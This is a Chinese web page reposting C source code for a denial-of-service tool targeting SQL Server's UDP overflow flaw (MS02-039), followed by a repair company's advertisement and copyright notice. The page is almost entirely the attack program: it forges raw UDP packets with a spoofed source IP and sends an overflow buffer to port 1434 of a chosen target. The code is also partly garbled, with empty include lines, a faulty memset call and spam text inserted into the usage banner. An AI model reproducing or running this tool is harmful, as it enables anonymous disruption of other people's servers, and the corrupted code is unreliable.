AR利用SQLSERVER的UDP溢出的DOS程序源代码

  ////////////////////////////////////////////////////////////
  // 　　　　　　　 　　　　
  // SQL Overflow dos tool
  //
  // Reference: MS02-039
  //
  // Author: refdom
  // Email: refdom@263.net
  // Homepage: www.opengram.com
  //
  ////////////////////////////////////////////////////////////
  #include
  #include
  #include
  #include
  #include
  #pragma comment(lib,"ws2_32.lib")
  #define SOURCE_PORT 53
  #define DEST_PORT 1434
  typedef struct ip_hdr //定义IP首部
  {
  unsigned char h_verlen; //4位首部长度,4位IP版本号
  unsigned char tos; //8位办事类型TOS
  unsigned short total_len; //16位总长度（字节）
  unsigned short ident; //16位标识
  unsigned short frag_and_flags; //3位标记位
  unsigned char ttl; //8位生存时间 TTL
  unsigned char proto; //8位协议 (TCP, UDP 或其他)
  unsigned short checksum; //16位IP首部校验和
  unsigned int sourceIP; //32位源IP地点
  unsigned int destIP; //32位目标IP地点
  }IP_HEADER;
  struct //定义TCP伪首部
  {
  unsigned long saddr; //源地点
  unsigned long daddr; //目标地点
  char mbz;
  char ptcl; //协议类型
  unsigned short tcpl; //TCP长度
  }psd_header;
  typedef struct tcp_hdr //定义TCP首部
  {
  USHORT th_sport; //16位源端口
  USHORT th_dport; //16位目标端口
  unsigned int th_seq; //32位序列号
  unsigned int th_ack; //32位确认号
  unsigned char th_lenres; //4位首部长度/6位保留字
  unsigned char th_flag; //6位标记位
  USHORT th_win; //16位窗口巨细
  USHORT th_sum; //16位校验和
  USHORT th_urp; //16位告急数据偏移量
  }TCP_HEADER;
  typedef struct udp_hdr //UDP首部
  {
  unsigned short sourceport;
  unsigned short destport;
  unsigned short udp_length;
  unsigned short udp_checksum;
  } UDP_HEADER;
  //CheckSum:盘算校验和的子函数
  USHORT checksum(USHORT *buffer, int size)
  {
  unsigned long cksum=0;
  while(size >1)
  {
  cksum+=*buffer++;
  size -=sizeof(USHORT);
  }
  if(size )
  {
  cksum += *(UCHAR*)buffer;
  }
  cksum = (cksum >> 16) + (cksum & 0xffff);
  cksum += (cksum >>16);
  return (USHORT)(~cksum);
  }
  void Usage()
  {
  printf("AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优\n");
  printf("SQLOverFlowDOS(MS02-039)\n");
  printf("\t Written by Refdom\n");
  printf("\t Email: refdom@263.net\n");
  printf("\t Homepage: www.opengram.com\n");
  printf("Useage: SQLDOS.exe Fake_ip Target_ip \n");
  printf("AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优AV女优*\n");
  }
  void Sendudp (unsigned long ulTargetIP, unsigned long ulFakeIP)
  {
  SOCKET sock;
  SOCKADDR_IN addr_in;
  BOOL flag;
  char buf[80] = {0};
  IP_HEADER ipHeader;
  UDP_HEADER udpHeader;
  int iTotalSize, iUdpCheckSumSize, i, j;
  char sendbuf[256] = {0};
  char *ptr = NULL;
  memset(buf, "A", sizeof(buf) - 2);
  buf[0] = 0x04;
  sock = WSASocket(AF_INET,SOCK_RAW,IPPROTO_UDP,NULL,0,0);
  if (sock == INVALID_SOCKET)
  {
  printf("socket Error!\n");
  return;
  }
  flag = true;
  if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char*)&flag,sizeof(flag))==SOCKET_ERROR)
  {
  printf("setsockopt Error!\n");
  return;
  }
  iTotalSize=sizeof(ipHeader)+sizeof(udpHeader)+sizeof(buf);
  ipHeader.h_verlen = (4 << 4) | (sizeof(ipHeader) / sizeof(unsigned long));
  ipHeader.tos=0;
  ipHeader.total_len=htons(iTotalSize);
  ipHeader.ident=0;
  ipHeader.frag_and_flags=0;
  ipHeader.ttl=128;
  ipHeader.proto=IPPROTO_UDP;
  ipHeader.checksum=0;
  ipHeader.sourceIP = ulFakeIP;
  ipHeader.destIP = ulTargetIP;
  udpHeader.sourceport = htons(SOURCE_PORT);
  udpHeader.destport = htons(DEST_PORT);
  udpHeader.udp_length = htons(sizeof(udpHeader)+sizeof(buf));
  udpHeader.udp_checksum = 0;
  ptr = NULL;
  //盘算UDP校验和
  ZeroMemory(sendbuf,sizeof(sendbuf));
  ptr=sendbuf;
  iUdpCheckSumSize=0;
  udpHeader.udp_checksum = 0;
  memcpy(ptr,&ipHeader.sourceIP,sizeof(ipHeader.sourceIP));
  ptr +=sizeof(ipHeader.sourceIP);
  iUdpCheckSumSize+=sizeof(ipHeader.sourceIP);
  memcpy(ptr,&ipHeader.destIP,sizeof(ipHeader.destIP));
  ptr +=sizeof(ipHeader.destIP);
  iUdpCheckSumSize +=sizeof(ipHeader.destIP);
  ptr++;
  iUdpCheckSumSize++;
  memcpy(ptr,&ipHeader.proto,sizeof(ipHeader.proto));
  ptr +=sizeof(ipHeader.proto);
  iUdpCheckSumSize +=sizeof(ipHeader.proto);
  memcpy(ptr,&udpHeader.udp_length,sizeof(udpHeader.udp_length));
  ptr +=sizeof(udpHeader.udp_length);
  iUdpCheckSumSize +=sizeof(udpHeader.udp_length);
  memcpy(ptr,&udpHeader,sizeof(udpHeader));
  ptr +=sizeof(udpHeader);
  iUdpCheckSumSize += sizeof(udpHeader);
  for(i = 0; i < sizeof(buf); i++,ptr++)
  *ptr = buf[i];
  iUdpCheckSumSize += sizeof(buf);
  udpHeader.udp_checksum = checksum((USHORT*)sendbuf,iUdpCheckSumSize);
  ZeroMemory(sendbuf,sizeof(sendbuf));
  memcpy(sendbuf,&ipHeader,sizeof(ipHeader));
  memcpy(sendbuf+sizeof(ipHeader),&udpHeader,sizeof(udpHeader));
  memcpy(sendbuf+sizeof(ipHeader)+sizeof(udpHeader),buf,sizeof(buf));
  addr_in.sin_family = AF_INET;
  addr_in.sin_port = htons(DEST_PORT);
  addr_in.sin_addr.S_un.S_addr = ulTargetIP ;
  printf("\n Starting send packet\n\t");
  for (j = 0; j < 5; j++)
  {
  Sleep(500);
  if (sendto(sock, sendbuf, iTotalSize, 0, (SOCKADDR *)&addr_in, sizeof(addr_in))==SOCKET_ERROR)
  {
  printf("Send Error!\n");
  return;
  }
  else
  {
  printf(".");
  }
  }
  printf("\n Send OK!\n");
  if (sock != INVALID_SOCKET)
  closesocket(sock);
  }
  int main(int argc, char* argv[])
  {
  WSADATA WSAData;
  unsigned long ulTargetIP, ulFakeIP;
  Usage();
  if (argc < 3)
  {
  return false;
  }
  ulTargetIP = inet_addr(argv[1]);
  ulFakeIP = inet_addr(argv[2]);
  if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
  {
  printf("WSAStartup error.Error:%d\n",WSAGetLastError());
  return false;
  }
  printf("DOS starting ...\n");
  Sendudp(ulTargetIP, ulFakeIP);
  printf("\nComplete!\n");
  WSACleanup();
  return 0;
  }
 

文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明：原创作品，允许转载，转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

评论加载中... 内容： 评论者： 验证码：